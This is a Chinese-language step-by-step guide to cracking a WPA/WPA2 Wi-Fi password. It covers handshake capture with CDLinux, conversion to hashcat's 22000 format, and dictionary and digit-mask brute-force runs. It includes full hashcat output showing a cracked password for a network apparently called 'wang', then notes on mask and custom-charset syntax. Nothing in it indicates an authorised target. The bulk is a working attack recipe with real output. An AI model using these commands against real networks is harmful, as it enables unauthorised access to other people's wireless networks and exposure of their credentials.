破解wifi
1.用CDLINUX抓包:*.cap
2转包文件:将cap文件转换并下载989_1637563967.hc22000
3.下载hashcat:https://hashcat.net/
4.命令:hashcat -m 22000 989_1637563967.hc22000 wang.txt
hashcat -m 22001 989_1637563967.hc22000 wang.txt
-m 22000 (22001)破解无线wifiwpa /wpa2
989_1637563967.hc22000抓包文件转换后的文件
wang.txt为密码字典
命令行结果:
hashcat (v6.2.5) starting
ADL2_New_QueryPMLogData_Get is missing from ADL shared library.
OpenCL API (OpenCL 2.1 AMD-APP (2580.6)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: AMD Radeon R5 M330, 1920/2048 MB (1523 MB allocatable), 5MCU
* Device #2: , skipped
OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) HD Graphics 520, 1568/3222 MB (1023 MB allocatable), 24MCU
* Device #4: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 847 MB
Dictionary cache hit:
* Filename..: wang.txt
* Passwords.: 26663
* Bytes.....: 266630
* Keyspace..: 26663
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
9e989c00edf52a6044042f296105049f:e8cc184afd30:d46075a8c704:wang:19641317(找到的密码)
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: 989_1637563967.hc22000
Time.Started.....: Mon Nov 22 14:52:29 2021 (1 sec)
Time.Estimated...: Mon Nov 22 14:52:30 2021 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (wang.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3036 H/s (0.36ms) @ Accel:64 Loops:16 Thr:128 Vec:1
Speed.#3.........: 2499 H/s (1.87ms) @ Accel:8 Loops:16 Thr:64 Vec:1
Speed.#*.........: 5535 H/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096/26663 (15.36%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 1536/26663 (5.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 19630902 -> 19650602
Candidates.#3....: 19590619 -> 19630901
Started: Mon Nov 22 14:52:23 2021
Stopped: Mon Nov 22 14:52:32 2021
5.不用密码字典:
E:\wifi\hashcat-6.2.5\hashcat-6.2.5>
第一步:hashcat -a 3 -m 22000 989_1637563967.hc22000 ?d?d?d?d?d?d
hashcat (v6.2.5) starting
ADL2_New_QueryPMLogData_Get is missing from ADL shared library.
OpenCL API (OpenCL 2.1 AMD-APP (2580.6)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: AMD Radeon R5 M330, 1920/2048 MB (1523 MB allocatable), 5MCU
* Device #2: , skipped
OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) HD Graphics 520, 1568/3222 MB (1023 MB allocatable), 24MCU
* Device #4: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
INFO: All hashes found in potfile! Use --show to display them.(表示找到密码但不显示)
如果显示(Skipping mask '?d?d?d?d?d?d' because it is smaller than the minimum password length.则表示没有找到密码)
Started: Mon Nov 22 15:15:29 2021
Stopped: Mon Nov 22 15:15:33 2021
第二步:hashcat -a 3 -m 22000 989_1637563967.hc22000 ?d?d?d?d?d?d --show显示结果
?d?d?d?d?d?d:8位数字
9e989c00edf52a6044042f296105049f:e8cc184afd30:d46075a8c704:wang:19641512
hashcat -a 3 -m 22000 1152_1637565237.hc22000 ?d?d?d?d?d?d?d?d?d?d?d(11位数字)
2. 暴力破解掩码模式
Brute-force 掩码暴力破解模式:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
比如 ?d?d?d?d?d?d?d?d 对应8位纯数字组合; ?l?l?l?l?d?d?d?d 对应前4位小写字母,后4位数字组合。。。
但如果我们不确定某一位到底是数字还是字母怎么写组合呢?这时候就要用到高级组合:
-1, --custom-charset1=CS
-2, --custom-charset2=CS
-3, --custom-charset3=CS
-4, --custom-charset4=CS
比如设置 --custom-charset1=?l?d 那么就表示 ?1代表小写字母与数字组合,那么8位随机的数字与小写字母组合可以写成 ?1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0 --custom-charset1=?l?d ?1?1?1?1?1?1?1?1
再比如设置 --custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 组成的所有可能组合,完整例子:
hashcat test.txt -a 3 -m 0 --custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2